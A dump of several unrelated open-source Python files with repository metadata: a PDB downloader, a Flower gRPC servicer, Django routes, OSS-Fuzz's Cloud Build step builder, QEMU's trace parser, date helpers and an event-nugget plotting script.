pdb_ids.append(result["identifier"])
return pdb_ids
async def async_download_pdbx(pdb_id: str, download_dir: str,
session: aiohttp.ClientSession,
sem: asyncio.Semaphore) -> None:
pdb_url = "https://files.rcsb.org/download/{}.cif".format(pdb_id)
pdb_file_path = os.path.join(download_dir, "{}.cif".format(pdb_id))
# This timeout is useless.
# timeout = aiohttp.ClientTimeout(total=30)
# A workaround solution:
# https://stackoverflow.com/a/64686124
# https://github.com/aio-libs/aiohttp/issues/3203
timeout = aiohttp.ClientTimeout(total=None, sock_connect=30, sock_read=30)
async with sem:
async with session.get(pdb_url, timeout=timeout) as response:
if response.status == 200:
content = await response.read()
with open(pdb_file_path, "wb") as fhand:
fhand.write(content)
# print("PDBx {} downloaded.".format(pdb_id))
else:
print("Unable to download PDBx {}!".format(pdb_id))
async def async_download_pdbxs(pdb_ids: str,
download_dir: str,
maximum_num_connections: int = 5) -> None:
if not os.path.exists(download_dir):
os.mkdir(download_dir)
tasks = []
# https://pawelmhm.github.io/asyncio/python/aiohttp/2016/04/22/asyncio-aiohttp.html
sem = asyncio.Semaphore(5)
connector = aiohttp.TCPConnector(limit_per_host=maximum_num_connections)
async with aiohttp.ClientSession(connector=connector) as session:
for pdb_id in pdb_ids:
task = asyncio.create_task(
async_download_pdbx(
pdb_id=pdb_id,
download_dir=download_dir,
session=session,
sem=sem,
))
tasks.append(task)
responses = [
await f
for f in tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))
]
# try:
# await asyncio.gather(*tasks)
# except Exception as e:
# print(repr(e))
# No progress bar.
# await asyncio.gather(*tasks)
def download_x_ray_pdbxs(download_dir: str,
maximum_resolution: float = 1.5) -> None:
print("Querying PDB IDs of maximum resolution {}...".format(
maximum_resolution))
pdb_ids = query_x_ray_entries(maximum_resolution=maximum_resolution)
print("Downloading {} PDBxs...".format(len(pdb_ids)))
time_start = time.time()
# Python 3.7+
# asyncio.run(async_download_pdbs(pdb_ids=pdb_ids, download_dir=download_dir))
# Python 3.5-3.6
loop = asyncio.get_event_loop()
loop.run_until_complete(
async_download_pdbxs(pdb_ids=pdb_ids, download_dir=download_dir))
time_end = time.time()
time_elapsed = time_end - time_start
print("Download Time Elapsed: {:02d}:{:02d}:{:02d}".format(
int(time_elapsed // 3600), int(time_elapsed % 3600 // 60),
int(time_elapsed % 60 // 1)))
| 31.559006
| 87
| 0.535131
|
d8cca4a8bf5d21134640ba9e13f8d2c67fee502c
| 3,996
|
py
|
Python
|
src/py/flwr/server/grpc_server/flower_service_servicer.py
|
sandracl72/flower
|
bb7f6e2e1f52753820784d262618113b4e7ebc42
|
[
"Apache-2.0"
] | null | null | null |
src/py/flwr/server/grpc_server/flower_service_servicer.py
|
sandracl72/flower
|
bb7f6e2e1f52753820784d262618113b4e7ebc42
|
[
"Apache-2.0"
] | null | null | null |
src/py/flwr/server/grpc_server/flower_service_servicer.py
|
sandracl72/flower
|
bb7f6e2e1f52753820784d262618113b4e7ebc42
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Servicer for FlowerService.
Relevant knowledge for reading this modules code:
- https://github.com/grpc/grpc/blob/master/doc/statuscodes.md
"""
from typing import Callable, Iterator
import grpc
from ...proto import transport_pb2_grpc
from ...proto.transport_pb2 import ClientMessage, ServerMessage
from ...server.client_manager import ClientManager
from ...server.grpc_server.grpc_bridge import GRPCBridge
from ...server.grpc_server.grpc_client_proxy import GrpcClientProxy
def default_bridge_factory() -> GRPCBridge:
"""Return GRPCBridge instance."""
return GRPCBridge()
def default_grpc_client_factory(cid: str, bridge: GRPCBridge) -> GrpcClientProxy:
"""Return GrpcClientProxy instance."""
return GrpcClientProxy(cid=cid, bridge=bridge)
def register_client(
client_manager: ClientManager,
client: GrpcClientProxy,
context: grpc.ServicerContext,
) -> bool:
"""Try registering GrpcClientProxy with ClientManager."""
is_success = client_manager.register(client)
if is_success:
def rpc_termination_callback() -> None:
client.bridge.close()
client_manager.unregister(client)
context.add_callback(rpc_termination_callback)
return is_success
class FlowerServiceServicer(transport_pb2_grpc.FlowerServiceServicer):
"""FlowerServiceServicer for bi-directional gRPC message stream."""
def __init__(
self,
client_manager: ClientManager,
grpc_bridge_factory: Callable[[], GRPCBridge] = default_bridge_factory,
grpc_client_factory: Callable[
[str, GRPCBridge], GrpcClientProxy
] = default_grpc_client_factory,
) -> None:
self.client_manager: ClientManager = client_manager
self.grpc_bridge_factory = grpc_bridge_factory
self.client_factory = grpc_client_factory
def Join( # pylint: disable=invalid-name
self,
request_iterator: Iterator[ClientMessage],
context: grpc.ServicerContext,
) -> Iterator[ServerMessage]:
"""Method will be invoked by each GrpcClientProxy which participates in
the network.
Protocol:
- The first message is sent from the server to the client
- Both ServerMessage and ClientMessage are message "wrappers"
wrapping the actual message
- The Join method is (pretty much) protocol unaware
"""
peer = context.peer()
bridge = self.grpc_bridge_factory()
client = self.client_factory(peer, bridge)
is_success = register_client(self.client_manager, client, context)
if is_success:
# Get iterators
client_message_iterator = request_iterator
server_message_iterator = bridge.server_message_iterator()
# All messages will be pushed to client bridge directly
while True:
try:
# Get server message from bridge and yield it
server_message = next(server_message_iterator)
yield server_message
# Wait for client message
client_message = next(client_message_iterator)
bridge.set_client_message(client_message)
except StopIteration:
break
| 36.327273
| 81
| 0.674925
|
cb5be9f023ed5d34046700ec7f33ae62b0db3067
| 741
|
py
|
Python
|
valet/urls.py
|
rayhu-osu/vcube
|
ff1af048adb8a9f1007368150a78b309b4d821af
|
[
"MIT"
] | 1
|
2019-02-20T18:47:04.000Z
|
2019-02-20T18:47:04.000Z
|
valet/urls.py
|
rayhu-osu/vcube
|
ff1af048adb8a9f1007368150a78b309b4d821af
|
[
"MIT"
] | null | null | null |
valet/urls.py
|
rayhu-osu/vcube
|
ff1af048adb8a9f1007368150a78b309b4d821af
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from django.conf import settings
from django.conf.urls.static import static
from . import views
app_name = 'valet'
urlpatterns = [
url(r'^(?P<driver_id>[0-9]+)/$', views.index, name='index'),
url(r'^(?P<driver_id>[0-9]+)/availability/$', views.availability, name='availability'),
url(r'^(?P<driver_id>[0-9]+)/order/$', views.order, name='order'),
url(r'^(?P<driver_id>[0-9]+)/order/(?P<store_id>[0-9]+)/$', views.store_detail, name='store_detail'),
url(r'^(?P<driver_id>[0-9]+)/deliver/$', views.deliver, name='deliver'),
url(r'^(?P<driver_id>[0-9]+)/deliver/(?P<consumer_id>[0-9]+)/$', views.deliver_detail, name='deliver_detail'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 43.588235
| 111
| 0.681511
|
f58b6cd057713fa2c1f00fcde0a34c1dc48cf093
| 13,912
|
py
|
Python
|
infra/gcb/build_project.py
|
kerberosmansour/oss-fuzz
|
c9f563c83a83edc817e7e8958477533d5b0b2b80
|
[
"Apache-2.0"
] | 1
|
2020-03-20T04:10:59.000Z
|
2020-03-20T04:10:59.000Z
|
infra/gcb/build_project.py
|
kerberosmansour/oss-fuzz
|
c9f563c83a83edc817e7e8958477533d5b0b2b80
|
[
"Apache-2.0"
] | null | null | null |
infra/gcb/build_project.py
|
kerberosmansour/oss-fuzz
|
c9f563c83a83edc817e7e8958477533d5b0b2b80
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
"""Starts project build on Google Cloud Builder.
Usage: build_project.py <project_dir>
"""
from __future__ import print_function
import datetime
import json
import os
import re
import sys
import yaml
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
import build_lib
FUZZING_BUILD_TAG = 'fuzzing'
GCB_LOGS_BUCKET = 'oss-fuzz-gcb-logs'
CONFIGURATIONS = {
'sanitizer-address': ['SANITIZER=address'],
'sanitizer-dataflow': ['SANITIZER=dataflow'],
'sanitizer-memory': ['SANITIZER=memory'],
'sanitizer-undefined': ['SANITIZER=undefined'],
'engine-libfuzzer': ['FUZZING_ENGINE=libfuzzer'],
'engine-afl': ['FUZZING_ENGINE=afl'],
'engine-honggfuzz': ['FUZZING_ENGINE=honggfuzz'],
'engine-dataflow': ['FUZZING_ENGINE=dataflow'],
'engine-none': ['FUZZING_ENGINE=none'],
}
DEFAULT_ARCHITECTURES = ['x86_64']
DEFAULT_ENGINES = ['libfuzzer', 'afl', 'honggfuzz']
DEFAULT_SANITIZERS = ['address', 'undefined']
LATEST_VERSION_FILENAME = 'latest.version'
LATEST_VERSION_CONTENT_TYPE = 'text/plain'
def usage():
sys.stderr.write('Usage: ' + sys.argv[0] + ' <project_dir>\n')
exit(1)
def load_project_yaml(project_dir):
project_name = os.path.basename(project_dir)
project_yaml_path = os.path.join(project_dir, 'project.yaml')
with open(project_yaml_path) as f:
project_yaml = yaml.safe_load(f)
project_yaml.setdefault('disabled', False)
project_yaml.setdefault('name', project_name)
project_yaml.setdefault('image', 'gcr.io/oss-fuzz/' + project_name)
project_yaml.setdefault('architectures', DEFAULT_ARCHITECTURES)
project_yaml.setdefault('sanitizers', DEFAULT_SANITIZERS)
project_yaml.setdefault('fuzzing_engines', DEFAULT_ENGINES)
project_yaml.setdefault('run_tests', True)
project_yaml.setdefault('coverage_extra_args', '')
project_yaml.setdefault('labels', {})
return project_yaml
def is_supported_configuration(fuzzing_engine, sanitizer, architecture):
fuzzing_engine_info = build_lib.ENGINE_INFO[fuzzing_engine]
if architecture == 'i386' and sanitizer != 'address':
return False
return (sanitizer in fuzzing_engine_info.supported_sanitizers and
architecture in fuzzing_engine_info.supported_architectures)
def get_sanitizers(project_yaml):
sanitizers = project_yaml['sanitizers']
assert isinstance(sanitizers, list)
processed_sanitizers = []
for sanitizer in sanitizers:
if isinstance(sanitizer, basestring):
processed_sanitizers.append(sanitizer)
elif isinstance(sanitizer, dict):
for key in sanitizer.iterkeys():
processed_sanitizers.append(key)
return processed_sanitizers
def workdir_from_dockerfile(dockerfile):
"""Parse WORKDIR from the Dockerfile."""
WORKDIR_REGEX = re.compile(r'\s*WORKDIR\s*([^\s]+)')
with open(dockerfile) as f:
lines = f.readlines()
for line in lines:
match = re.match(WORKDIR_REGEX, line)
if match:
# We need to escape '$' since they're used for subsitutions in Container
# Builer builds.
return match.group(1).replace('$', '$$')
return None
def get_build_steps(project_dir):
project_yaml = load_project_yaml(project_dir)
dockerfile_path = os.path.join(project_dir, 'Dockerfile')
name = project_yaml['name']
image = project_yaml['image']
run_tests = project_yaml['run_tests']
ts = datetime.datetime.now().strftime('%Y%m%d%H%M')
build_steps = [
{
'args': [
'clone',
'https://github.com/google/oss-fuzz.git',
],
'name': 'gcr.io/cloud-builders/git',
},
{
'name': 'gcr.io/cloud-builders/docker',
'args': [
'build',
'-t',
image,
'.',
],
'dir': 'oss-fuzz/projects/' + name,
},
{
'name': image,
'args': [
'bash', '-c',
'srcmap > /workspace/srcmap.json && cat /workspace/srcmap.json'
],
'env': ['OSSFUZZ_REVISION=$REVISION_ID'],
},
{
'name': 'gcr.io/oss-fuzz-base/msan-builder',
'args': [
'bash',
'-c',
'cp -r /msan /workspace',
],
},
]
for fuzzing_engine in project_yaml['fuzzing_engines']:
for sanitizer in get_sanitizers(project_yaml):
for architecture in project_yaml['architectures']:
if not is_supported_configuration(fuzzing_engine, sanitizer,
architecture):
continue
env = CONFIGURATIONS['engine-' + fuzzing_engine][:]
env.extend(CONFIGURATIONS['sanitizer-' + sanitizer])
out = '/workspace/out/' + sanitizer
stamped_name = '-'.join([name, sanitizer, ts])
latest_version_file = '-'.join(
[name, sanitizer, LATEST_VERSION_FILENAME])
zip_file = stamped_name + '.zip'
stamped_srcmap_file = stamped_name + '.srcmap.json'
bucket = build_lib.ENGINE_INFO[fuzzing_engine].upload_bucket
if architecture != 'x86_64':
bucket += '-' + architecture
upload_url = build_lib.get_signed_url(
build_lib.GCS_UPLOAD_URL_FORMAT.format(bucket, name, zip_file))
srcmap_url = build_lib.get_signed_url(
build_lib.GCS_UPLOAD_URL_FORMAT.format(bucket, name,
stamped_srcmap_file))
latest_version_url = build_lib.GCS_UPLOAD_URL_FORMAT.format(
bucket, name, latest_version_file)
latest_version_url = build_lib.get_signed_url(
latest_version_url, content_type=LATEST_VERSION_CONTENT_TYPE)
targets_list_filename = build_lib.get_targets_list_filename(sanitizer)
targets_list_url = build_lib.get_signed_url(
build_lib.get_targets_list_url(bucket, name, sanitizer))
env.append('OUT=' + out)
env.append('MSAN_LIBS_PATH=/workspace/msan')
env.append('ARCHITECTURE=' + architecture)
workdir = workdir_from_dockerfile(dockerfile_path)
if not workdir:
workdir = '/src'
failure_msg = ('*' * 80 + '\nFailed to build.\nTo reproduce, run:\n'
'python infra/helper.py build_image {name}\n'
'python infra/helper.py build_fuzzers --sanitizer '
'{sanitizer} --engine {engine} --architecture '
'{architecture} {name}\n' + '*' * 80).format(
name=name,
sanitizer=sanitizer,
engine=fuzzing_engine,
architecture=architecture)
build_steps.append(
# compile
{
'name':
image,
'env':
env,
'args': [
'bash',
'-c',
# Remove /out to break loudly when a build script
# incorrectly uses /out instead of $OUT.
# `cd /src && cd {workdir}` (where {workdir} is parsed from
# the Dockerfile). Container Builder overrides our workdir
# so we need to add this step to set it back.
('rm -r /out && cd /src && cd {workdir} && mkdir -p {out} '
'&& compile || (echo "{failure_msg}" && false)'
).format(workdir=workdir, out=out, failure_msg=failure_msg),
],
})
if sanitizer == 'memory':
# Patch dynamic libraries to use instrumented ones.
build_steps.append({
'name':
'gcr.io/oss-fuzz-base/msan-builder',
'args': [
'bash',
'-c',
# TODO(ochang): Replace with just patch_build.py once
# permission in image is fixed.
'python /usr/local/bin/patch_build.py {0}'.format(out),
],
})
if run_tests:
failure_msg = ('*' * 80 + '\nBuild checks failed.\n'
'To reproduce, run:\n'
'python infra/helper.py build_image {name}\n'
'python infra/helper.py build_fuzzers --sanitizer '
'{sanitizer} --engine {engine} --architecture '
'{architecture} {name}\n'
'python infra/helper.py check_build --sanitizer '
'{sanitizer} --engine {engine} --architecture '
'{architecture} {name}\n' + '*' * 80).format(
name=name,
sanitizer=sanitizer,
engine=fuzzing_engine,
architecture=architecture)
build_steps.append(
# test binaries
{
'name':
'gcr.io/oss-fuzz-base/base-runner',
'env':
env,
'args': [
'bash', '-c',
'test_all || (echo "{0}" && false)'.format(failure_msg)
],
})
if project_yaml['labels']:
# write target labels
build_steps.append({
'name':
image,
'env':
env,
'args': [
'/usr/local/bin/write_labels.py',
json.dumps(project_yaml['labels']),
out,
],
})
if sanitizer == 'dataflow' and fuzzing_engine == 'dataflow':
dataflow_steps = dataflow_post_build_steps(name, env)
if dataflow_steps:
build_steps.extend(dataflow_steps)
else:
sys.stderr.write('Skipping dataflow post build steps.\n')
build_steps.extend([
# generate targets list
{
'name':
'gcr.io/oss-fuzz-base/base-runner',
'env':
env,
'args': [
'bash',
'-c',
'targets_list > /workspace/{0}'.format(
targets_list_filename),
],
},
# zip binaries
{
'name':
image,
'args': [
'bash', '-c',
'cd {out} && zip -r {zip_file} *'.format(out=out,
zip_file=zip_file)
],
},
# upload srcmap
{
'name': 'gcr.io/oss-fuzz-base/uploader',
'args': [
'/workspace/srcmap.json',
srcmap_url,
],
},
# upload binaries
{
'name': 'gcr.io/oss-fuzz-base/uploader',
'args': [
os.path.join(out, zip_file),
upload_url,
],
},
# upload targets list
{
'name':
'gcr.io/oss-fuzz-base/uploader',
'args': [
'/workspace/{0}'.format(targets_list_filename),
targets_list_url,
],
},
# upload the latest.version file
build_lib.http_upload_step(zip_file, latest_version_url,
LATEST_VERSION_CONTENT_TYPE),
# cleanup
{
'name': image,
'args': [
'bash',
'-c',
'rm -r ' + out,
],
},
])
return build_steps
def dataflow_post_build_steps(project_name, env):
steps = build_lib.download_corpora_steps(project_name)
if not steps:
return None
steps.append({
'name':
'gcr.io/oss-fuzz-base/base-runner',
'env':
env + [
'COLLECT_DFT_TIMEOUT=2h',
'DFT_FILE_SIZE_LIMIT=65535',
'DFT_MIN_TIMEOUT=2.0',
'DFT_TIMEOUT_RANGE=6.0',
],
'args': [
'bash', '-c',
('for f in /corpus/*.zip; do unzip -q $f -d ${f%%.*}; done && '
'collect_dft || (echo "DFT collection failed." && false)')
],
'volumes': [{
'name': 'corpus',
'path': '/corpus'
}],
})
return steps
def get_logs_url(build_id):
URL_FORMAT = ('https://console.developers.google.com/logs/viewer?'
'resource=build%2Fbuild_id%2F{0}&project=oss-fuzz')
return URL_FORMAT.format(build_id)
def run_build(build_steps, project_name, tag):
options = {}
if 'GCB_OPTIONS' in os.environ:
options = yaml.safe_load(os.environ['GCB_OPTIONS'])
build_body = {
'steps': build_steps,
'timeout': str(build_lib.BUILD_TIMEOUT) + 's',
'options': options,
'logsBucket': GCB_LOGS_BUCKET,
'tags': [project_name + '-' + tag,],
}
credentials = GoogleCredentials.get_application_default()
cloudbuild = build('cloudbuild', 'v1', credentials=credentials)
build_info = cloudbuild.projects().builds().create(projectId='oss-fuzz',
body=build_body).execute()
build_id = build_info['metadata']['build']['id']
print('Logs:', get_logs_url(build_id), file=sys.stderr)
print(build_id)
def main():
if len(sys.argv) != 2:
usage()
project_dir = sys.argv[1].rstrip(os.path.sep)
steps = get_build_steps(project_dir)
project_name = os.path.basename(project_dir)
run_build(steps, project_name, FUZZING_BUILD_TAG)
if __name__ == '__main__':
main()
| 32.966825
| 80
| 0.53249
|
8bbcb42cc4126dad27b43259f84b40161bcba088
| 5,917
|
py
|
Python
|
AndroidTrustyOS/external/qemu/scripts/simpletrace.py
|
haitao52198/TrustyOS
|
40ad09911aa12dd774fefcab9747c30da802d2c8
|
[
"Apache-2.0"
] | 9
|
2017-11-10T15:54:02.000Z
|
2021-04-15T20:57:29.000Z
|
AndroidTrustyOS/external/qemu/scripts/simpletrace.py
|
haitao52198/TrustyOS
|
40ad09911aa12dd774fefcab9747c30da802d2c8
|
[
"Apache-2.0"
] | null | null | null |
AndroidTrustyOS/external/qemu/scripts/simpletrace.py
|
haitao52198/TrustyOS
|
40ad09911aa12dd774fefcab9747c30da802d2c8
|
[
"Apache-2.0"
] | 7
|
2018-01-08T02:53:32.000Z
|
2020-10-15T13:01:46.000Z
|
#!/usr/bin/env python
#
# Pretty-printer for simple trace backend binary trace files
#
# Copyright IBM, Corp. 2010
#
# This work is licensed under the terms of the GNU GPL, version 2. See
# the COPYING file in the top-level directory.
#
# For help see docs/tracing.txt
import struct
import re
import inspect
from tracetool import _read_events, Event
from tracetool.backend.simple import is_string
header_event_id = 0xffffffffffffffff
header_magic = 0xf2b177cb0aa429b4
dropped_event_id = 0xfffffffffffffffe
log_header_fmt = '=QQQ'
rec_header_fmt = '=QQII'
def read_header(fobj, hfmt):
'''Read a trace record header'''
hlen = struct.calcsize(hfmt)
hdr = fobj.read(hlen)
if len(hdr) != hlen:
return None
return struct.unpack(hfmt, hdr)
def get_record(edict, rechdr, fobj):
"""Deserialize a trace record from a file into a tuple (event_num, timestamp, arg1, ..., arg6)."""
if rechdr is None:
return None
rec = (rechdr[0], rechdr[1])
if rechdr[0] != dropped_event_id:
event_id = rechdr[0]
event = edict[event_id]
for type, name in event.args:
if is_string(type):
l = fobj.read(4)
(len,) = struct.unpack('=L', l)
s = fobj.read(len)
rec = rec + (s,)
else:
(value,) = struct.unpack('=Q', fobj.read(8))
rec = rec + (value,)
else:
(value,) = struct.unpack('=Q', fobj.read(8))
rec = rec + (value,)
return rec
def read_record(edict, fobj):
"""Deserialize a trace record from a file into a tuple (event_num, timestamp, arg1, ..., arg6)."""
rechdr = read_header(fobj, rec_header_fmt)
return get_record(edict, rechdr, fobj) # return tuple of record elements
def read_trace_file(edict, fobj):
"""Deserialize trace records from a file, yielding record tuples (event_num, timestamp, arg1, ..., arg6)."""
header = read_header(fobj, log_header_fmt)
if header is None or \
header[0] != header_event_id or \
header[1] != header_magic:
raise ValueError('Not a valid trace file!')
if header[2] != 0 and \
header[2] != 2:
raise ValueError('Unknown version of tracelog format!')
log_version = header[2]
if log_version == 0:
raise ValueError('Older log format, not supported with this QEMU release!')
while True:
rec = read_record(edict, fobj)
if rec is None:
break
yield rec
class Analyzer(object):
"""A trace file analyzer which processes trace records.
An analyzer can be passed to run() or process(). The begin() method is
invoked, then each trace record is processed, and finally the end() method
is invoked.
If a method matching a trace event name exists, it is invoked to process
that trace record. Otherwise the catchall() method is invoked."""
def begin(self):
"""Called at the start of the trace."""
pass
def catchall(self, event, rec):
"""Called if no specific method for processing a trace event has been found."""
pass
def end(self):
"""Called at the end of the trace."""
pass
def process(events, log, analyzer):
"""Invoke an analyzer on each event in a log."""
if isinstance(events, str):
events = _read_events(open(events, 'r'))
if isinstance(log, str):
log = open(log, 'rb')
enabled_events = []
dropped_event = Event.build("Dropped_Event(uint64_t num_events_dropped)")
edict = {dropped_event_id: dropped_event}
for e in events:
if 'disable' not in e.properties:
enabled_events.append(e)
for num, event in enumerate(enabled_events):
edict[num] = event
def build_fn(analyzer, event):
if isinstance(event, str):
return analyzer.catchall
fn = getattr(analyzer, event.name, None)
if fn is None:
return analyzer.catchall
event_argcount = len(event.args)
fn_argcount = len(inspect.getargspec(fn)[0]) - 1
if fn_argcount == event_argcount + 1:
# Include timestamp as first argument
return lambda _, rec: fn(*rec[1:2 + event_argcount])
else:
# Just arguments, no timestamp
return lambda _, rec: fn(*rec[2:2 + event_argcount])
analyzer.begin()
fn_cache = {}
for rec in read_trace_file(edict, log):
event_num = rec[0]
event = edict[event_num]
if event_num not in fn_cache:
fn_cache[event_num] = build_fn(analyzer, event)
fn_cache[event_num](event, rec)
analyzer.end()
def run(analyzer):
"""Execute an analyzer on a trace file given on the command-line.
This function is useful as a driver for simple analysis scripts. More
advanced scripts will want to call process() instead."""
import sys
if len(sys.argv) != 3:
sys.stderr.write('usage: %s <trace-events> <trace-file>\n' % sys.argv[0])
sys.exit(1)
events = _read_events(open(sys.argv[1], 'r'))
process(events, sys.argv[2], analyzer)
if __name__ == '__main__':
class Formatter(Analyzer):
def __init__(self):
self.last_timestamp = None
def catchall(self, event, rec):
i = 1
timestamp = rec[1]
if self.last_timestamp is None:
self.last_timestamp = timestamp
delta_ns = timestamp - self.last_timestamp
self.last_timestamp = timestamp
fields = [event.name, '%0.3f' % (delta_ns / 1000.0)]
for type, name in event.args:
if is_string(type):
fields.append('%s=%s' % (name, rec[i + 1]))
else:
fields.append('%s=0x%x' % (name, rec[i + 1]))
i += 1
print ' '.join(fields)
run(Formatter())
| 31.811828
| 112
| 0.607909
|
bcbb8bf582b7260b9220fd17207211d2dbc409eb
| 1,797
|
py
|
Python
|
utils/date.py
|
holachau/Supermercados_BAN
|
374d474dcd9bf763df129eae840fe17e1dd6f5f7
|
[
"MIT"
] | 3
|
2018-10-27T19:11:16.000Z
|
2018-10-28T18:49:53.000Z
|
utils/date.py
|
holachau/Trabajos-Practicos
|
374d474dcd9bf763df129eae840fe17e1dd6f5f7
|
[
"MIT"
] | 16
|
2018-10-28T14:12:42.000Z
|
2018-11-12T01:54:16.000Z
|
utils/date.py
|
holachau/Trabajos-Practicos
|
374d474dcd9bf763df129eae840fe17e1dd6f5f7
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
formato = {
"date": {
"format": "%d-%m-%Y",
"label": "dd-mm-YYYY"
},
"datetime": {
"format": "%d-%m-%Y %H:%M:%S",
"label": "dd-mm-YYYY HH:mm:ss"
}
}
def newDate(fecha):
try:
return datetime.strptime(fecha, formato["date"]["format"])
except ValueError:
return False
def formatDate(fecha):
try:
return fecha.strftime(formato["date"]["format"])
except AttributeError:
return False
def fieldDate(label):
valido = False
while valido == False:
fecha = newDate(input("Ingresar " + label + " (" + formato["date"]["label"] +"): "))
if (fecha):
valido = True
else:
print("Error de formato...")
return fecha
def newDateTime(fecha):
try:
return datetime.strptime(fecha, formato["datetime"]["format"])
except ValueError:
return False
def formatDateTime(fecha):
try:
return fecha.strftime(formato["datetime"]["format"])
except AttributeError:
return False
def fieldDateTime(label):
valido = False
while valido == False:
fecha = newDateTime(input("Ingresar " + label + " (" + formato["datetime"]["label"] +"): "))
if (fecha):
valido = True
else:
print("Error de formato...")
return fecha
def now():
return datetime.now()
def addDays(fecha, days):
return fecha + timedelta(days=days)
#TEST
#DATE
# fecha = newDate('01-01-2008')
# print(fecha)
# print(type(fecha))
# print(formatDate(fecha))
# print(type(formatDate(fecha)))
#DATE TIME
# fecha = newDateTime('01-01-2008 22:10:1')
# print(fecha)
# print(type(fecha))
# print(formatDateTime(fecha))
# print(type(formatDateTime(fecha)))
| 23.644737
| 100
| 0.584307
|
cb0e91a72d4b2864d76b78527d3f3cbb813afd51
| 4,680
|
py
|
Python
|
trec2015/sbin/salience-regression-dev/nugget-dist-graph.py
|
kedz/cuttsum
|
992c21192af03fd2ef863f5ab7d10752f75580fa
|
[
"Apache-2.0"
] | 6
|
2015-09-10T02:22:21.000Z
|
2021-10-01T16:36:46.000Z
|
trec2015/sbin/salience-regression-dev/nugget-dist-graph.py
|
kedz/cuttsum
|
992c21192af03fd2ef863f5ab7d10752f75580fa
|
[
"Apache-2.0"
] | null | null | null |
trec2015/sbin/salience-regression-dev/nugget-dist-graph.py
|
kedz/cuttsum
|
992c21192af03fd2ef863f5ab7d10752f75580fa
|
[
"Apache-2.0"
] | 2
|
2018-04-04T10:44:32.000Z
|
2021-10-01T16:37:26.000Z
|
import cuttsum.events
import cuttsum.judgements
import cuttsum.corpora
from cuttsum.pipeline import InputStreamResource
from cuttsum.classifiers import NuggetRegressor
import matplotlib.pylab as plt
plt.style.use('ggplot')
import pandas as pd
import numpy as np
from datetime import datetime
nuggets = cuttsum.judgements.get_nuggets()
matches_df = cuttsum.judgements.get_merged_dataframe()
def get_input_stream(event, gold_probs, extractor="goose", thresh=.8, delay=None, topk=20,
max_nuggets=None, is_filter=False):
corpus = cuttsum.corpora.get_raw_corpus(event)
res = InputStreamResource()
df = pd.concat(
res.get_dataframes(event, corpus, extractor, thresh, delay, topk))
selector = (df["n conf"] == 1) & (df["nugget probs"].apply(len) == 0)
df.loc[selector, "nugget probs"] = df.loc[selector, "nuggets"].apply(lambda x: {n:1 for n in x})
df["true probs"] = df["nugget probs"].apply(lambda x: [val for key, val in x.items()] +[0])
df["true probs"] = df["true probs"].apply(lambda x: np.max(x))
df.loc[(df["n conf"] == 1) & (df["nuggets"].apply(len) == 0), "true probs"] = 0
if gold_probs is True:
df["probs"] = df["true probs"]
else:
df["probs"] = NuggetRegressor().predict(event, df)
df["nuggets"] = df["nugget probs"].apply(
lambda x: set([key for key, val in x.items() if val > .97]))
if max_nuggets is not None:
def sortme(x):
l = [(key, val) for key, val in x.items() if val > .5]
sorted(l, key=lambda y: y[1], reverse=True)
return [k for k,v in l[:max_nuggets]]
df["nuggets"] = df["nuggets"].apply(lambda x: x if len(x) <= max_nuggets else set([]))
#df["nuggets"] = df["nugget probs"].apply(sortme)
if is_filter:
nid2time = {}
nids = set(matches_df[matches_df["query id"] == event.query_id]["nugget id"].tolist())
for nid in nids:
ts = matches_df[matches_df["nugget id"] == nid]["update id"].apply(lambda x: int(x.split("-")[0])).tolist()
ts.sort()
nid2time[nid] = ts[0]
#tss = nuggets[nuggets["query id"] == event.query_id]["timestamp"].tolist()
#ids = nuggets[nuggets["query id"] == event.query_id]["nugget id"].tolist()
#nt = {nid: ts for ts, nid in zip(tss, ids)}
fltr_nuggets = []
for name, row in df.iterrows():
fltr_nuggets.append(
set([nug for nug in row["nuggets"] if nid2time[nug] <= row["timestamp"]]))
#print df[["nuggets", "timestamp"]].apply(lambda y: print y[0]) # datetime.utcfromtimestamp(int(y["timestamp"])))
#print nids
df["nuggets"] = fltr_nuggets
return df
plt.close("all")
df = cuttsum.judgements.get_merged_dataframe()
i = 1
for event in cuttsum.events.get_events():
if event.query_num > 25 or event.query_num == 7: continue
print event.fs_name()
timestamps = df[df["query id"] == event.query_id]["update id"].apply(lambda x: datetime.utcfromtimestamp(int(x.split("-")[0]))).tolist()
z = (event.end - event.start).total_seconds()
ts_norm = [(ts - event.start).total_seconds() / z for ts in timestamps]
y = [i] * len(ts_norm)
plt.plot(ts_norm, y, "x")
stream = get_input_stream(event, True, max_nuggets=3, is_filter=True)
timestamps = stream[stream["nuggets"].apply(len) > 0]["timestamp"].tolist()
timestamps = [datetime.utcfromtimestamp(int(ts)) for ts in timestamps]
ts_norm = [(ts - event.start).total_seconds() / z for ts in timestamps]
plt.plot(ts_norm, [i + .5] * len(ts_norm), "x")
# stream = get_input_stream(event, True, max_nuggets=None)
# timestamps = stream[stream["nuggets"].apply(len) > 0]["timestamp"].tolist()
# timestamps = [datetime.utcfromtimestamp(int(ts)) for ts in timestamps]
# ts_norm = [(ts - event.start).total_seconds() / z for ts in timestamps]
# plt.plot(ts_norm, [i + .6] * len(ts_norm), "x")
# if event.query_num == 3:
# from collections import defaultdict
# counts = defaultdict(int)
# for name, row in stream.iterrows():
# for nid in row["nuggets"]:
# counts[nid] += 1
# items = sorted(counts.items(), key=lambda x: x[1])
# for k, v in items:
# print k, v, nuggets[nuggets["nugget id"] == k].iloc[0]["text"]
# top2 = set([k for k,v in items[-2:]])
# for name, row in stream.iterrows():
# if len(top2.intersection(row["nuggets"])) > 0:
# print row["nuggets"]
# print row["pretty text"]
i += 1
plt.gca().set_ylim([0, 25])
plt.yticks(range(1,25))
plt.savefig("test.png")
| 41.052632
| 141
| 0.611966
|
